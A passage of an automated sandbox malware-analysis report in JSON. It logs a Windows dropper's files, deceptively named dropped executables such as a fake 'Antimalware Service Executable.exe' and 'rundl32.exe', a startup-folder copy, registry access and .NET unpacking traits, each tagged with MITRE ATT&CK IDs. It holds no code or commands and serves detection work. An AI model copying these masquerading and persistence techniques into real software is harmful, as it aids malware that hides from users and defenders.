\"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"rundl32.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"rundl32.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"rundl32.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"rundl32.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"rundl32.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"Stable_Network.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Antimalware Service Executable.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ole32.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\bcrypt.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\bcrypt.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\shell32.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\apphelp.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"rundl32.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"Stable_Network.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"host.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"dw20.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"GameSDK.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"CL_Debug_Log.txt\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"schtasks.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" connecting to \"\\ThemeApiPort\"\n \"rundl32.exe\" connecting to \"\\ThemeApiPort\"\n \"Stable_Network.exe\" connecting to \"\\ThemeApiPort\"\n \"host.exe\" connecting to \"\\ThemeApiPort\"\n \"GameSDK.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"\n \"schtasks.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" reads file \"c:\\users\\%osuser%\\searches\\desktop.ini\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" reads file \"c:\\users\\%osuser%\\videos\\desktop.ini\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" reads file \"c:\\users\\%osuser%\\pictures\\desktop.ini\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" reads file \"c:\\users\\%osuser%\\contacts\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\rundl32.exe\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\stable_network.exe\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\host.exe\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\system.dll.exe\"\n \"Stable_Network.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\aut3301.tmp\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"SYSTEM\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"DISABLE\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"SOURCEPATH\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"DEVICEPATH\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"INSTALLROOT\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\RPC\"; Key: \"\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"Stable_Network.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Roaming\\Microsoft\\Windows\\Antimalware Service Executable.exe\" (UID: 6124)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"rundl32.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\rundl32.exe]- [targetUID: 00000000-00006060]\n \"5b4af3576e30808651ae14fbef1ee719.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\5b4af3576e30808651ae14fbef1ee719.exe]- [targetUID: 00000000-00003876]\n \"aut3301.tmp\" has type \"data\"- Location: [%TEMP%\\aut3301.tmp]- [targetUID: 00000000-00006124]\n \"CL_Debug_Log.txt\" has type \"PE32 executable (console) Intel 80386 for MS Windows\"- Location: [%TEMP%\\CL_Debug_Log.txt]- [targetUID: 00000000-00006124]\n \"aut8E99.tmp\" has type \"data\"- Location: [%TEMP%\\aut8E99.tmp]- [targetUID: 00000000-00006124]\n \"SystemCheck.xml\" has type \"XML 1.0 document ASCII text with CRLF line terminators\"- Location: [%TEMP%\\SystemCheck.xml]- [targetUID: 00000000-00006124]\n \"GameSDK.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%ALLUSERSPROFILE%\\GameSDK.exe]- [targetUID: 00000000-00003876]\n \"host.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%APPDATA%\\host.exe]- [targetUID: 00000000-00006040]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-53", "type": 8, "relevance": 1, "name": "Drops temp files", "description": "\"aut3301.tmp\" has type \"data\" - Location: [%TEMP%\\aut3301.tmp]\n \"aut8E99.tmp\" has type \"data\" - Location: [%TEMP%\\aut8E99.tmp]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-39", "type": 8, "relevance": 1, "name": "Drops XML files", "description": "\"SystemCheck.xml\" has type \"XML 1.0 document ASCII text with CRLF line terminators\" - Location: [%TEMP%\\SystemCheck.xml]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"host.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"Stable_Network.exe\" called \"FindResourceW\" with parameter \"200\" - (UID: 00000000-00006124)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"Stable_Network.exe\" called \"LoadResource with parameter {'hModule': '8388608', 'hResInfo': '9209128'}\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadResource with parameter {'hModule': '8388608', 'hResInfo': '9209144'}\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadResource with parameter {'hModule': '8388608', 'hResInfo': '9208968'}\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadResource with parameter {'hModule': '8388608', 'hResInfo': '9209176'}\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadResource with parameter {'hModule': '8388608', 'hResInfo': '9208824'}\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadResource with parameter {'hModule': '8388608', 'hResInfo': '9209160'}\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadResource with parameter {'hModule': '8388608', 'hResInfo': '9208840'}\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadResource with parameter {'hModule': '8388608', 'hResInfo': '9208984'}\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadResource with parameter {'hModule': '8388608', 'hResInfo': '9209192'}\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadResource with parameter {'hModule': '8388608', 'hResInfo': '9208856'}\" (UID: 00000000-00006124)\n \"Stable_Network.exe\" called \"LoadResource with parameter {'hModule': '1876951040', 'hResInfo': '1877127688'}\" (UID: 00000000-00006124)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-135", "relevance": 1, "name": "Dotnet file contains function to dynamically call methods at runtime", "description": "Observed namespace \"Microsoft.VisualBasic.CompilerServices\" and MemberReference \"LateCall\" in \"rundl32.exe\"\n Observed namespace \"System\" and MemberReference \"GetMethods\" in \"rundl32.exe\"\n Observed namespace \"Microsoft.VisualBasic.CompilerServices\" and MemberReference \"LateCall\" in \"5b4af3576e30808651ae14fbef1ee719.exe\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-115", "relevance": 1, "name": "Dotnet code contains potential unpacker", "description": "Observed function \"System.Load\" in \"rundl32.exe\"\n Observed function \"System.Reflection.Load\" in \"5b4af3576e30808651ae14fbef1ee719.exe\"", "origin": "Static Parser", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-134", "relevance": 1, "name": "Dotnet file contains encryption/decryption functions", "description": "Observed namespace \"System.Security.Cryptography\" and MemberReference \"CreateDecryptor\" in \"rundl32.exe\"\n Observed namespace \"System.Security.Cryptography\" and MemberReference \"TransformFinalBlock\" in \"rundl32.exe\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100005300780053005c007800380036005f006d006900630072006f0073006f00660074002e0076006300380030002e006300720074005f0031006600630038006200330062003900610031006500310038006500330062005f0038002e0030002e00350030003700320037002e0034003900 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310002636d886a0000f002000000006c6d886a4ac4f363d8d77a65c4f59202c0f5920200000000000000000000000000000000d8d77a6518f592020000000088f59202c4f5920258f59202ff23886ac83b916a98f592023117886a080000001c5cb37714a1b477ffffffff2400000080f59202 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000100000001000000000000000000000077006f0072006b0000000000000000000000000000000000010000002f0000000000000000000000720077006b0073002e0064006c006c000000640000000000000030000000000000000000000000000000000000000000 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb15772803ae020040fd7f9a5cb57700f0fd7f58b792024440fd7f00000000400000003f000000230000000040fd7f4cb79202c15cb5776082bc77230000000040fd7f9a5cb57700f0fd7f70b792025789b4778083bc771317b175d8eb1577 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006040)\n \"rundl32.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100372c2c4973576f77363450726f636573732c6b65726e656c33322e646c6c2c223235323a30333a31312e323936222c52583d302c50583d30003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006060)\n \"host.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000010b93a00a0f66500145cb477435cb4776cf7650001000000940138000100000020f66500935cb5774083bc77d4a0b4771250c9776cf76500010000000100000080fd3a0000000000f0f5650020f665008cf6650095e1b077caa21800feffffffd4a0b4771bbeb0750000627700000000 (UID: 00000000-00006136)\n \"host.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100005300780053005c007800380036005f006d006900630072006f0073006f00660074002e0076006300380030002e006300720074005f0031006600630038006200330062003900610031006500310038006500330062005f0038002e0030002e00350030003700320037002e0034003900 (UID: 00000000-00006136)\n \"host.exe\" called \"GetVersionExA\" with parameter 